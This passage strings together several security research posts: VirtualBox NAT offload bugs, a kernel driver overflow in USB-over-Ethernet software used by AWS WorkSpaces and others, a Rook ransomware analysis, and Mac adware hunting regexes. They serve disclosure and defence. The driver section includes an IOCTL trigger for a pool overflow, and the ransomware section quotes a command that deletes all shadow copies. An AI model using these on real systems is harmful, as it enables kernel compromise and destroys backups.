DECLINLINE(uint32_t) PDMNetGsoCalcSegmentCount(PCPDMNETWORKGSO pGso, size_t cbFrame)
{
    size_t cbPayload;
    Assert(PDMNetGsoIsValid(pGso, sizeof(*pGso), cbFrame));
    cbPayload = cbFrame - pGso->cbHdrsSeg;
    return (uint32_t)((cbPayload + pGso->cbMaxSeg - 1) / pGso->cbMaxSeg);
}

As mentioned before, assertions like these are not compiled in the release build. This results in invalid GSO parameters being allowed; a miscalculation can be caused for the size given to slirp_ext_m_get, making it less than the total copied amount by the memcpy in the for-loop. In my proof-of-concept, my parameters for the calculation of pGso->cbHdrsTotal + pGso->cbMaxSeg used for cbMin resulted in an allocation of 0x4000 bytes, but the calculation for cbPayload resulted in a memcpy call for 0x4065 bytes, overflowing the allocated region.
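The effect of skipping the validity check can be seen by mirroring the arithmetic of PDMNetGsoCalcSegmentCount in isolation (a sketch, not VirtualBox code): nothing prevents cbHdrsSeg from exceeding cbFrame, in which case the unsigned subtraction wraps around and every size derived from it disagrees with the allocation.

```c
#include <assert.h>
#include <stdint.h>
#include <stddef.h>

/* Mirrors the arithmetic in PDMNetGsoCalcSegmentCount with the
 * (release-build no-op) PDMNetGsoIsValid assertion removed. */
static uint32_t calc_segment_count(uint8_t cbHdrsSeg, uint16_t cbMaxSeg, size_t cbFrame)
{
    size_t cbPayload = cbFrame - cbHdrsSeg;  /* wraps if cbHdrsSeg > cbFrame */
    return (uint32_t)((cbPayload + cbMaxSeg - 1) / cbMaxSeg);
}
```

With a sane frame (54 bytes of headers, 2920 bytes of payload, 1460-byte MSS) this yields 2 segments; with cbHdrsSeg larger than cbFrame, cbPayload becomes an enormous unsigned value and the resulting segment sizes no longer fit the buffers allocated for them.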

CVE-2021-2442 - Oracle VirtualBox NAT UDP Header Out-of-Bounds

The title of this post makes it seem like GSO is the only vulnerable offload mechanism in place here; however, another offload mechanism is vulnerable too: Checksum Offload.

Checksum offloading can be applied to various protocols that have checksums in their message headers. When emulating, VirtualBox supports this for both TCP and UDP.

In order to access this feature, the GSO frame needs to have the first bit of the u8Flags member set to indicate that the checksum offload is required. In the case of VirtualBox, this bit must always be set since it cannot handle GSO without performing the checksum offload. When VirtualBox handles UDP packets with GSO, it can end up in the function PDMNetGsoCarveSegmentQD in certain circumstances:

            case PDMNETWORKGSOTYPE_IPV4_UDP:
                if (iSeg == 0)
                    pdmNetGsoUpdateUdpHdrUfo(RTNetIPv4PseudoChecksum((PRTNETIPV4)&pbFrame[pGso->offHdr1]),
                                             pbSegHdrs, pbFrame, pGso->offHdr2);
                break;

The function pdmNetGsoUpdateUdpHdrUfo uses the offHdr2 to indicate where the UDP header is in the packet structure. Eventually this leads to a function called RTNetUDPChecksum:

RTDECL(uint16_t) RTNetUDPChecksum(uint32_t u32Sum, PCRTNETUDP pUdpHdr)
{
    bool fOdd;
    u32Sum = rtNetIPv4AddUDPChecksum(pUdpHdr, u32Sum);
    fOdd = false;
    u32Sum = rtNetIPv4AddDataChecksum(pUdpHdr + 1, RT_BE2H_U16(pUdpHdr->uh_ulen) - sizeof(*pUdpHdr), u32Sum, &fOdd);
    return rtNetIPv4FinalizeChecksum(u32Sum);
}

This is where the vulnerability is. In this function, the uh_ulen property is completely trusted without any validation, which results in either a size that is outside of the bounds of the buffer, or an integer underflow from the subtraction of sizeof(*pUdpHdr).

rtNetIPv4AddDataChecksum receives both the size value and the packet header pointer and proceeds to calculate the checksum:

    /* iterate the data. */
    while (cbData > 1)
    {
        u32Sum += *pw;
        pw++;
        cbData -= 2;
    }

From an exploitation perspective, adding large amounts of out-of-bounds data together may not seem particularly interesting. However, if the attacker is able to re-allocate the same heap location for consecutive UDP packets while increasing the UDP size parameter two bytes at a time, it is possible to calculate the difference between successive checksums and disclose the out-of-bounds data.
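The disclosure primitive works because the checksum is essentially a linear sum of 16-bit words: two sums over buffers whose lengths differ by one word differ by exactly that word. A toy version of the idea (the helper names below are hypothetical, not VirtualBox functions):

```c
#include <assert.h>
#include <stdint.h>
#include <stddef.h>

/* Plain running sum of 16-bit words, in the style of rtNetIPv4AddDataChecksum. */
static uint32_t add_data_checksum(const void *pvData, size_t cbData, uint32_t u32Sum)
{
    const uint16_t *pw = (const uint16_t *)pvData;
    while (cbData > 1)
    {
        u32Sum += *pw;
        pw++;
        cbData -= 2;
    }
    return u32Sum;
}

/* Differencing sums over cbKnown and cbKnown + 2 bytes leaks the next word. */
static uint16_t leak_next_word(const uint8_t *pb, size_t cbKnown)
{
    uint32_t a = add_data_checksum(pb, cbKnown, 0);
    uint32_t b = add_data_checksum(pb, cbKnown + 2, 0);
    return (uint16_t)(b - a);
}
```

An attacker who can observe the resulting checksum and bump uh_ulen two bytes at a time can repeat this subtraction to read adjacent heap memory one word per packet. (The real code folds the 32-bit sum into a ones’ complement 16-bit checksum, which complicates the recovery but does not prevent it.)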

On top of this, it’s also possible to use this vulnerability to cause a denial-of-service against other VMs in the network:

Got another Virtualbox vuln fixed (CVE-2021-2442)

Works as both an OOB read in the host process, as well as an integer underflow. In some instances, it can also be used to remotely DoS other Virtualbox VMs!

— maxpl0it (@maxpl0it) August 1, 2021


Offload support is commonplace in modern network devices so it’s only natural that virtualization software emulating devices does it as well. While most public research has been focused on their main components, such as ring buffers, offloads don’t appear to have had as much scrutiny. Unfortunately in this case I didn’t manage to get an exploit together in time for the Pwn2Own contest, so I ended up reporting the first two to the Zero Day Initiative and the checksum bug to Oracle directly.

USB Over Ethernet | Multiple Vulnerabilities in AWS and Other Major Cloud Services

7 December 2021 at 11:00

Executive Summary

  • SentinelLabs has discovered a number of high severity flaws in driver software affecting numerous cloud services.
  • Cloud desktop solutions like Amazon Workspaces rely on third-party libraries, including Eltima SDK, to provide ‘USB over Ethernet’ capabilities that allow users to connect and share local devices like webcams. These cloud services are in use by millions of customers worldwide.
  • Vulnerabilities in Eltima SDK, derivative products, and proprietary variants are unwittingly inherited by cloud customers.
  • These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to the vulnerable vendors during Q2 2021 and the vulnerabilities are tracked as CVE-2021-42972, CVE-2021-42973, CVE-2021-42976, CVE-2021-42977, CVE-2021-42979, CVE-2021-42980, CVE-2021-42983, CVE-2021-42986, CVE-2021-42987, CVE-2021-42988, CVE-2021-42990, CVE-2021-42993, CVE-2021-42994, CVE-2021-42996, CVE-2021-43000, CVE-2021-43002, CVE-2021-43003, CVE-2021-43006, CVE-2021-43637, CVE-2021-43638, CVE-2021-42681, CVE-2021-42682, CVE-2021-42683, CVE-2021-42685, CVE-2021-42686, CVE-2021-42687, CVE-2021-42688.
  • Vendors have released security updates to address these vulnerabilities. Some of these are automatically applied while others require customer actions.
  • At this time, SentinelLabs has not discovered evidence of in-the-wild abuse.


Throughout 2020-2021, organizations worldwide needed to adopt new work models, including work from home (WFH), in response to the COVID-19 pandemic. This required organizations to make use of various solutions that allow WFH employees to securely access their organization’s assets and resources. As a result, the market for WFH solutions has seen tremendous growth, but security has not necessarily evolved accordingly.

In this post, we disclose details of multiple vulnerabilities we discovered in major cloud services including:

  • Amazon Nimble Studio AMI, prior to: 2021/07/29
  • Amazon NICE DCV, below: 2021.1.7744 (Windows), 2021.1.3560 (Linux), 2021.1.3590 (Mac), 2021/07/30
  • Amazon WorkSpaces agent, below: v1.0.1.1537, 2021/07/31
  • Amazon AppStream client version below: 1.1.304, 2021/08/02
  • NoMachine [all products for Windows], above v4.0.346 below v.7.7.4 (v.6.x is being updated as well)
  • Accops HyWorks Client for Windows: version v3.2.8.180 or older
  • Accops HyWorks DVM Tools for Windows: version or lower (Part of Accops HyWorks product earlier than v3.3 R3)
  • Eltima USB Network Gate below 9.2.2420 above 7.0.1370
  • Amzetta zPortal Windows zClient <= v3.2.8180.148
  • Amzetta zPortal DVM Tools <= v3.3.148.148
  • FlexiHub below 5.2.14094 (latest) above 3.3.11481
  • Donglify below 1.7.14110 (latest) above 1.0.12309

It is important to note that:

  1. These vulnerabilities originated from a library developed and provided by Eltima, which is in use by several cloud providers.
  2. Both the end user (AWS WorkSpaces client in this example) and cloud service (AWS WorkSpaces running in AWS Cloud) are vulnerable to various vulnerabilities we will discuss below. This peculiarity can be attributed to code-sharing between both the server side and client side applications.
  3. While we have confirmed these vulnerabilities for AWS, NoMachine and Accops, our testing was limited in scope to these vendors, and we believe it is highly likely other cloud providers using the same libraries would be vulnerable.
  4. Also, of the vendors tested, not all vendors were tested for both client side and server side vulnerabilities; consequently, there might also be further instances of the vulnerabilities there.

Technical Details

While these vulnerabilities affect multiple products, the technical details below will mainly focus on AWS WorkSpaces as an example. This is where our research began, and the flaws are essentially the same across all mentioned products.

Amazon WorkSpaces is a fully managed and persistent desktop virtualization service that enables users to access data, applications, and resources they need anywhere from any supported device. WorkSpaces supports provisioning Windows or Linux desktops and can be quickly scaled to provide thousands of desktops to workers across the globe.

WorkSpaces increases security by keeping data off the end user’s device and increasing reliability with the power of the AWS Cloud, an increasingly valuable service for the growing remote workforce.

WorkSpaces architecture; source: AWS

As shown above, authentication and session orchestration is done over HTTPS, while the data stream is either PCoIP (PC Over IP) or WSP (WorkSpaces Streaming Protocol), a proprietary protocol.

The main difference between them is that on Amazon WorkSpaces, only WSP supports device redirection such as smart cards and webcams. This is where the vulnerabilities reside.

The WSP protocol consists of several libraries, some of which are provided by 3rd parties. One of these is the Eltima SDK. Eltima develops a product called “USB Over Ethernet”, which enables remote USB redirection.

The same product, with some modifications, is used by Amazon WorkSpaces to enable its users to redirect USB devices to their remote desktop, allowing them to connect devices such as USB webcams to Zoom calls directly from the remote desktop.

The program is bundled with the “client” (connect to other shared devices) and the “server” (share a device over the internet):

USB Over Ethernet screenshot; source: Eltima

The drivers responsible for USB redirection are wspvuhub.sys and wspusbfilter.sys, both of which are vulnerable and seem to have been in use since the beginning of 2020, when WSP protocol was announced.

Before going through the vulnerabilities, it’s important to understand how the Windows Kernel IO Manager (IOMgr) works. When a user-mode thread sends an IRP_MJ_DEVICE_CONTROL packet, it passes input and output data between the user-mode and kernel-mode, depending on the I/O Control (IOCTL) code invoked. As per Microsoft’s documentation, “an I/O control code is a 32-bit value that consists of several fields”, as illustrated in the following figure:

Input/output Control Code Structure; source: Microsoft

For the purposes of this post, we will focus on the two least significant bits, TransferType. The documentation tells us that these bits indicate how the system will pass data between the caller of NtDeviceIoControlFile syscall and the driver that handles the IRP.

There are three ways to exchange data between kernel mode and user mode using an IRP:

  1. METHOD_BUFFERED – considered the most secure. With this method, the IOMgr copies the caller’s input data into a system buffer and, on completion, copies results from the system buffer back into the caller’s output buffer.
  2. METHOD_IN/OUT_DIRECT – Depending on the data direction, the IOMgr will supply an MDL that describes a buffer, and ensures that the executing thread has read/write-access to the buffer. IOCTL routines can then lock the buffer to the memory.
  3. METHOD_NEITHER – considered more prone to faults. The IOMgr doesn’t map/validate the supplied buffer; the IOCTL handler receives a user-mode address. This is mostly used for high speed data processing.

The IOCTL handlers 0x22005B and 0x22001B contain several vulnerabilities and are identical across all affected products.

This code deals with a user buffer of type METHOD_NEITHER (Type3InputBuffer)

This means that the IOCTL handler is responsible for validating, probing, locking, and mapping the buffer itself depending on the use case.
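This can be verified by decoding the control codes directly. The macros below follow the standard Windows CTL_CODE bit layout (device type in bits 16-31, access in bits 14-15, function in bits 2-13, transfer type in bits 0-1):

```c
#include <assert.h>
#include <stdint.h>

/* Field extraction for a Windows I/O control code (CTL_CODE layout). */
#define IOCTL_DEVICE_TYPE(code)  (((code) >> 16) & 0xFFFF)
#define IOCTL_ACCESS(code)       (((code) >> 14) & 0x3)
#define IOCTL_FUNCTION(code)     (((code) >> 2)  & 0xFFF)
#define IOCTL_METHOD(code)       ((code) & 0x3)

#define METHOD_BUFFERED    0
#define METHOD_IN_DIRECT   1
#define METHOD_OUT_DIRECT  2
#define METHOD_NEITHER     3
```

Both 0x22001B and 0x22005B have their two low bits set, i.e. METHOD_NEITHER, so the handlers receive raw user-mode pointers with no help from the IOMgr.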

This opens up many possibilities for exploiting the device, such as double fetches and arbitrary pointer dereferences, which can lead to further vulnerabilities. As the image below shows, buffer verification does not exist at all in this code:

IOCTL 0x22001B Handler

Here’s a brief explanation of this code:

  1. First, the routine checks whether the calling process is 32bit or 64bit (red arrow).
  2. It then decides whether to use alloc_size_64bit or alloc_size_32bit based on the first check’s results (blue arrow) .
  3. Next, there is a call to ExAllocatePoolWithTag_wrapper with user controlled size parameter (pink arrow).
  4. At this point, the code proceeds to blocks that handle 32 bit memmove (yellow arrow) and 64 bit memmove (green arrow). As can be seen in the image, at this stage there are cases of insecure arithmetic operations on user controlled data without any overflow checks when calculating the copy size, which can lead to integer overflows that might eventually lead to arbitrary code execution.

Generally speaking, accessing (reading/writing) user-mode addresses requires probing. Dealing with a Type3InputBuffer also requires locking the pages in memory and fetching the data only once.

The easiest way to cause an overflow in this code is by passing different parameters for the allocation and copy functions. This can be done by crafting a special IRP:

struct struct_usercontrolled {
        int gap1;
        int firstObject_handle;
        int secondObject_handle;
        int thirdObject_handle;
        int alloc_size_32bit;
        unsigned int gap2;
        unsigned int copy_size_32bit;
        unsigned int alloc_size_64bit;
        unsigned int gap3;
        unsigned int copy_size_64bit;
};
Where either copy_size_64bit or copy_size_32bit are greater than alloc_size_32bit or alloc_size_64bit.

Even if the copy size and allocation size were the exact same parameter, the code would still be exploitable because of the insecure arithmetic operations performed when calculating the memmove size parameter.
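A minimal sketch of that class of bug (illustrative arithmetic, not the driver’s exact expression): when a fixed overhead is added to a user-controlled 32-bit size with no check, the result can wrap below the value used for the allocation.

```c
#include <assert.h>
#include <stdint.h>

/* Unchecked size arithmetic: the addition may wrap modulo 2^32. */
static uint32_t copy_size(uint32_t user_size, uint32_t overhead)
{
    return user_size + overhead;
}

/* Detects the wrap the driver fails to check for. */
static int is_overflowed(uint32_t user_size, uint32_t overhead)
{
    return copy_size(user_size, overhead) < user_size;
}
```

An allocation sized from the wrapped value, paired with a copy driven by the original (or a differently derived) size, leaves the pool buffer smaller than the amount of data copied into it.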

In a simplified version, to trigger this vulnerability, an attacker may send the following IOCTL (assuming running a 64bit process):

uc.alloc_size_64bit = 0x20;
uc.copy_size_64bit = 0x100;
memset(&ol, 0, sizeof(ol)); // _OVERLAPPED
ol.hEvent = EventW;
if (!DeviceIoControl(file_device_handle, 0x22001B, &uc, size, &OutBuffer, 8u, &NumberOfBytesTransferred, &ol) && (GetLastError() != ERROR_IO_PENDING || !GetOverlappedResult(file_device_handle, &ol, &NumberOfBytesTransferred, 1))) {
    exit(printf("IOCTL 0x22001B\r\n"));
}

This code will result in allocation of 0x20 bytes:

3: kd> r
rax=0000000000000000 rbx=ffff92889d98ad40 rcx=0000000000000001
rdx=0000000000000020 rsi=ffff92889d98a000 rdi=000000603e8ff5c8
rip=fffff80627175366 rsp=ffffde0f29eed6e0 rbp=0000000000000000
 r8=0000000000004c50  r9=fffff806271761e0 r10=fffff80627170ca0
r11=0000000000000000 r12=ffff92889962bc40 r13=0000000000000000
r14=0000000000000020 r15=ffff92889949eb38
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
fffff806`27175366 e899c6ffff      call    wspvuhub+0x11a04 (fffff806`27171a04)

and copying of 0x435 bytes:

3: kd> r
rax=ffffad0e69959eb0 rbx=ffff92889d98ad40 rcx=ffffad0e69959eb0
rdx=000000603e8ff5c8 rsi=ffffad0e69959eb0 rdi=000000603e8ff5c8
rip=fffff80627175420 rsp=ffffde0f29eed6e0 rbp=0000000000000000
 r8=0000000000000435  r9=00000000000001b0 r10=0000000000004c50
r11=0000000000001001 r12=ffff92889962bc40 r13=0000000000000000
r14=0000000000000020 r15=ffff92889949eb38
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
fffff806`27175420 e85b090000      call    wspvuhub+0x15d80 (fffff806`27175d80)

Since we control both the data and the size this makes a very strong primitive to achieve code execution in kernel mode.

BSoD Proof Of Concept

Using the DeviceTree tool from OSR, we can see that this driver accepts IOCTLs without ACL enforcements (note: Some drivers handle access to devices independently in IRP_MJ_CREATE routines):

Using DeviceTree software to examine the security descriptor of the device

This means the vulnerability can be triggered from sandboxes and might be exploitable in contexts other than just local privilege escalation. For example, it might be used as a second-stage browser attack (although most modern browsers maintain a list of allowed IOCTL requests) or from other sandboxes for that matter.


  • Who is affected? Users with the mentioned client versions are prone to vulnerabilities that if exploited successfully may be used to gain high privileges. Since the vulnerable code exists in both the remote and local side, remote desktops are also affected by this vulnerability.
  • What is the risk? These high severity flaws could allow any user on the computer, even without privileges, to escalate privileges and run code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products. An attacker with access to an organization’s network may also gain access to execute code on unpatched systems and use this vulnerability to gain local elevation of privilege. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement.


We responsibly disclosed our findings to product vendors. We are aware of the following vendor responses:

Accops has released an advisory page here.

NoMachine has released an advisory page here.

On AWS (Amazon Workspaces), a manual update needs to be performed if you either have:

  1. AutoStop WorkSpaces with maintenance turned off.
  2. AlwaysOn WorkSpaces with OS updates turned off.

In order to check your maintenance settings:

  1. Open the WorkSpaces console at
  2. In the navigation pane, choose Directories.
  3. Select your directory, and choose Actions, Update Details.
  4. Expand Maintenance Mode.

Make sure to update the client application.

While we have no evidence of in-the-wild exploitation of these vulnerabilities, we further recommend revoking any privileged credentials that were deployed to the platform before the cloud platforms were patched, and checking access logs for irregularities.


Vulnerabilities in third-party code have the potential to put huge numbers of products, systems, and ultimately, end users at risk, as we’ve noted before. The outsized effect of vulnerable dependency code is magnified even further when it appears in services offered by cloud providers. We urge all organizations relying on the affected services to review the recommendations above and take appropriate action.

As part of the commitment of SentinelLabs to advancing public cloud security, we actively invest in public cloud research, including advanced threat modeling and vulnerability testing of cloud platforms and related technologies. For maximum protection, we strongly recommend using SentinelOne Singularity platform.

We would like to thank those vendors that responded to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline


AWS

  • May 2, 2021 – Initial disclosure.
  • May 2, 2021 – First response from AWS security team.
  • May 7, 2021 – AWS security team reported that they’re still actively investigating the issue.
  • May 13, 2021 – AWS security team reported that they’re still actively investigating the issue.
  • May 18, 2021 – AWS security team acknowledged the reported issues.
  • Jun 25, 2021 – AWS security team reported that they pushed out a fix to all regions.
  • Jul 1, 2021 – AWS security team asked for more technical details regarding the issues.
  • Jul 11, 2021 – SentinelOne answered the questions.


Eltima

  • Jun 6, 2021 – Initial disclosure.
  • Jun 14, 2021 – Eltima Support first responded that they’re reviewing the report.
  • Jun 15, 2021 – Eltima Support claimed that they were aware of the vulnerabilities but considered them resolved because the feature is turned off.
  • Jun 15, 2021 – We responded that the product is still vulnerable even if the feature is turned off.
  • Jun 15, 2021 – Eltima Support responded that they had discontinued using those IOCTLs for security reasons but kept them for backward compatibility.
  • Jun 19, 2021 – We clarified that the vulnerable code is still reachable and exploitable.
  • Jun 29, 2021 – Eltima Support responded that their team had started work on a new build without the mentioned vulnerabilities.
  • Jul 1, 2021 – Eltima Support requested more time.
  • Sep 6, 2021 – Eltima notified us that they released fixed versions for their products.


Accops

  • Jun 28, 2021 – Initial disclosure.
  • Jun 28, 2021 – Accops first responded that they’re reviewing the report.
  • Sep 5, 2021 – Accops reported that the issue is fixed and updated modules are available from Accops website and support portal for download. Customers are notified to upgrade to new versions. Fixed modules are Accops HyWorks Client for Windows version onwards and Accops HyWorks DVM Tools for Windows version onwards (part of Accops HyWorks release 3.3 R3).
  • Dec 4, 2021 – Accops has released a utility to detect vulnerable endpoints. The utility is downloadable from Accops support site.


  • We tried to contact Mechdyne several times during June 2021 to September 2021 but did not receive a response.


  • Jul 1, 2021 – Initial disclosure.
  • Jul 2, 2021 – Amzetta acknowledged the vulnerabilities and removed the product from their website.
  • Sep 3, 2021 – Amzetta notified us that they released fixed versions for their products.


  • Jun 28, 2021 – Initial disclosure.
  • Jul 5, 2021 – NoMachine acknowledged the vulnerabilities.
  • Oct 21, 2021 – NoMachine informed us that the patches are released.

New Rook Ransomware Feeds Off the Code of Babuk

23 December 2021 at 17:39

By Jim Walter and Niranjan Jayanand

First noticed on VirusTotal on November 26th by researcher Zack Allen, Rook Ransomware initially attracted attention for the operators’ rather unorthodox self-introduction, which stated that “We desperately need a lot of money” and “We will stare at the internet”.

These odd pronouncements prompted some mirth on social media, but they were followed a few days later by more serious news. On November 30th, Rook claimed its first victim: a Kazakh financial institution from which the Rook operators had stolen 1123 GB of data, according to the gang’s victim website. Further victims have been claimed since then.

In this post, we offer the first technical write up of the Rook ransomware family, covering both its main high-level features and its ties to the Babuk codebase.

Technical Details

Rook ransomware is primarily delivered via a third-party framework, for example Cobalt Strike; however, delivery via phishing email has also been reported in the wild.

Individual samples are typically UPX packed, although alternate packers/crypters have been observed such as VMProtect.

Upon execution, Rook samples pop a command window, with differing output displayed. For example, some versions show the output path for kph.sys (a component of Process Hacker), while others display inaccurate information around the use of ADS (Alternate Data Streams).

False ADS message
Rook dropping kph.sys

The ransomware attempts to terminate any process that may interfere with encryption. Interestingly, we see the kph.sys driver from Process Hacker come into play in process termination in some cases but not others. This likely reflects the attacker’s need to leverage the driver to disable certain local security solutions on specific engagements.

There are numerous process names, service names and folder names included in each sample’s configuration. For example, in sample 19CE538B2597DA454ABF835CFF676C28B8EB66F7, the following processes, services and folders are excluded from the encryption process:

Process names skipped:


Service names terminated:


Folder names skipped:

Program Files
Program Files (x86)
Tor Browser
Internet Explorer
Opera Software

File names skipped:


As with most modern ransomware families, Rook will also attempt to delete volume shadow copies to prevent victims from restoring from backup. This is achieved via vssadmin.exe.

Rook & vssadmin.exe as seen in SentinelOne console

The following syntax is used:

vssadmin.exe delete shadows /all /quiet

Early variants of Rook were reported to have used a .TOWER extension. All current variants seen by SentinelLabs use the .ROOK extension.

.ROOK extension on affected files

In the samples we analyzed, no persistence mechanisms were observed, and after the malware runs through its execution, it cleans up by deleting itself.

Babuk Overlaps

There are a number of code similarities between Rook and Babuk. Based on the samples available so far, this appears to be an opportunistic result of the various Babuk source code leaks we have seen over 2021, including leaks of both the compiled builders and the actual source. On this basis, we surmise that Rook is just the latest example of an apparently novel ransomware capitalizing on the ready availability of Babuk source code.

Babuk and Rook use the EnumDependentServicesA API to retrieve the name and status of each service that depends on a specified service before terminating it. They enumerate all services in the system and stop any that appear in a hardcoded list in the malware. Using the OpenSCManagerA API, the code obtains a handle to the Service Control Manager and then enumerates all services on the system.

Rook enumerates all services
Rook service termination

In addition, both Rook and Babuk use the functions CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, and TerminateProcess to enumerate running processes and kill any found to match those in a hardcoded list.

Babuk and Rook share the same process exclusion list
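The shared enumerate-and-kill logic described above can be illustrated with a short sketch. This is illustrative Python, not the malware’s actual code: the Toolhelp snapshot APIs are replaced by a plain list, and the process names are hypothetical stand-ins for the hardcoded configuration.

```python
# Illustrative sketch of the shared Babuk/Rook kill logic: walk the
# process list (CreateToolhelp32Snapshot/Process32NextW on Windows)
# and terminate anything matching a hardcoded list. The names below
# are hypothetical examples, not the actual configuration.

KILL_LIST = {"sql.exe", "oracle.exe", "firefox.exe"}

def processes_to_terminate(running_processes):
    """Return running processes whose names match the kill list.

    Matching is case-insensitive, mirroring how process names are
    typically compared on Windows.
    """
    return [p for p in running_processes if p.lower() in KILL_LIST]

running = ["explorer.exe", "SQL.exe", "Oracle.exe", "notepad.exe"]
print(processes_to_terminate(running))  # ['SQL.exe', 'Oracle.exe']
```

In the real samples, each match is then opened with OpenProcess and killed with TerminateProcess.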

Also similar is the use of the Windows Restart Manager API to aid with process termination, which includes processes related to MS Office products and the popular gaming platform Steam.

Babuk Process termination

We also noted overlap with regards to some of the environmental checks and subsequent behaviors, including the removal of Volume Shadow Copies.

Both Babuk and Rook check if the sample is executed in a 64-bit OS, then delete the shadow volumes of the user machine. The code flows to Wow64DisableWow64FsRedirection to disable file system redirection before calling ShellExecuteW to delete shadow copies.

Babuk VSS deletion (similar to Rook)

Babuk and Rook implement similar code for enumerating local drives. Rook checks for the local drives alphabetically as shown below.

Enumerating local drives

The Rook Victim Website

Like other recent ransomware varieties, Rook embraces a dual-pronged extortion approach: an initial demand for payment to unlock encrypted files, followed by public threats via the operators’ website to leak exfiltrated data should the victim fail to comply with the ransom demand.

Rook’s welcome message (TOR-based website)

This TOR-based site is used to name victims and to host stolen data should a victim decide not to cooperate. Rook also uses the site to openly boast that it has the “latest vulnerability database”, that “we can always penetrate the target system”, and of its desire for success: “We desperately need a lot of money”.

These statements appear under the heading of “why us?” and could be intended to attract affiliates as well as convince victims that they mean business.

About Rook (TOR-based website)

At the time of writing, three companies have been listed on the Rook blog, spanning different industries.

Expanded victim data


Given the economics of ransomware – high reward for low risk – and the ready availability of source code from leaks like Babuk, it’s inevitable that the proliferation of new ransomware groups we’re seeing now is only going to continue. Rook may be here today and gone tomorrow, or it could stick around until the actors behind it decide they’ve had enough (or made enough), but what is certain is that Rook won’t be the last malware we see feeding off the leaked Babuk code.

Add that to the incentive provided by recent vulnerabilities such as Log4j2 that can allow initial access without great technical skill, and enterprise security teams have a recipe for a busy year ahead. Prevention is critical, along with well-documented and tested disaster recovery (DRP) and business continuity (BCP) procedures. All SentinelOne customers are protected from Rook ransomware.

Indicators of Compromise



T1027.002 – Obfuscated Files or Information: Software Packing
T1007 – System Service Discovery
T1059 – Command and Scripting Interpreter
TA0010 – Exfiltration
T1082 – System Information Discovery
T1490 – Inhibit System Recovery

A Threat Hunter’s Guide to the Mac’s Most Prevalent Adware Infections 2022

4 January 2022 at 18:26

Last month, as we closed out 2021, we shared the most recent malware discoveries afflicting the Mac platform, covering spyware, targeted attacks on developers and activists, cryptocurrency theft and cryptomining. As worrisome as those are, the bulk of infections affecting Mac users in and out of enterprise settings revolve around adware.

Once little more than a minor nuisance, adware on all platforms has taken a darker turn in recent years, often emulating malware TTPs and regularly surpassing many malware families in sophistication and speed of evolution. What’s driven these developments is simple: adware makes a lot of money. Adware also harvests a lot of data from infections, which can be sold off to other actors.

Most importantly from a security team’s point of view, adware infections set up hidden, persistent executables, engage in device and environmental fingerprinting, use anti-removal, anti-analysis and detection-avoidance techniques, and reach out to unknown URLs to deliver custom payloads, typically without the knowledge or informed consent of the user or, in the enterprise case, the device owner.

For all these reasons, knowing how to detect an adware infection is no less important than any other malware infection. In this post, we shine a light on the most prevalent adware families affecting the Mac platform over the last 3 months and describe the typical infection patterns for each.

Cataloguing and sharing what we know in this way has two benefits. It enables defenders to improve their immediate detection responses in the short-term, and it represents a cost to threat actors in the mid-term, who are forced to invest in retooling and rethinking their approach.

1. Adload System_Service

Adload has probably been around since 2016 and is the most common family we see in live infections today. We have discussed specific Adload campaigns a few times in the past, here and here, and we advise readers to review those posts for earlier Adload indicators. In this entry, we include only those indicators that we have not detailed before or that we saw in the last quarter of 2021 and early 2022.

The System_Service campaign remains the most active of current variants that we observe.

These infections follow a predictable file path pattern:

Hunting Regex

.*/Library\/Application Support\/\.[0-9]{19,}\/(Services|System)/com\.\w+\.(service|system)\/\w+\.(service|system)


~/Library/Application Support/.15314127506195013446/Services/com.SkilledObject.service/SkilledObject.service
~/Library/Application Support/.16951906660859967924/Services/com.SkilledUnit.service/SkilledUnit.service
/Library/Application Support/.2301650498054541179/System/com.ElementaryType.system/ElementaryType.system
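As a sanity check, the hunting regex can be tested against the example paths above with a few lines of Python:

```python
import re

# The System_Service hunting regex from above
PATTERN = re.compile(
    r".*/Library\/Application Support\/\.[0-9]{19,}\/"
    r"(Services|System)/com\.\w+\.(service|system)\/\w+\.(service|system)"
)

paths = [
    "~/Library/Application Support/.15314127506195013446"
    "/Services/com.SkilledObject.service/SkilledObject.service",
    "/Library/Application Support/.2301650498054541179"
    "/System/com.ElementaryType.system/ElementaryType.system",
]

for p in paths:
    print(bool(PATTERN.fullmatch(p)))  # True for both
```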

A similar, older but still active pattern does not contain the System or Service terms and does away with the hidden parent folders.


~/Library/Application Support/com.AdvancedRecord/AdvancedRecord
~/Library/Application Support/com.NetDataSearch/NetDataSearch

2. Adload Go Variant (Rload/Lador)

An increasingly common pattern we are seeing throughout late 2021 involves Adload variants written in either Go (aka Rload/Lador) or Kotlin. The Go variants currently drop a payload with the following file path pattern:

Hunting Regex

Library/Application\ Support/com\.\d{19,}\.[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}/_\d{19,21}


/Library/Application Support/com.11592658482052096796.D18B18A4-7ED8-434B-B3A1-6F109CA25EB5/_14139136474173706141
/Library/Application Support/com.2718493167946217159.4E41C598-9C07-4446-96A4-CE22A41B6BF1/_5214250257291383846

Note that the executable file name only contains numerals. Although the underscore prefix is present more often than not in instances we observed, there are cases of this pattern where the underscore is not present.
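Note also that the hexadecimal portions of the observed paths are uppercase, so hunting tools should match this pattern case-insensitively. A quick Python check against one of the sample paths above:

```python
import re

# Go-variant hunting regex from above; matched case-insensitively
# because the UUID hex digits in observed paths are uppercase.
PATTERN = re.compile(
    r"Library/Application\ Support/com\.\d{19,}\."
    r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
    r"/_\d{19,21}",
    re.IGNORECASE,
)

path = ("/Library/Application Support/com.11592658482052096796."
        "D18B18A4-7ED8-434B-B3A1-6F109CA25EB5/_14139136474173706141")
print(bool(PATTERN.search(path)))  # True
```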

3. Adload Kotlin Variant

The Kotlin variant of Adload uses a different but still quite distinctive pattern:

Hunting Regex

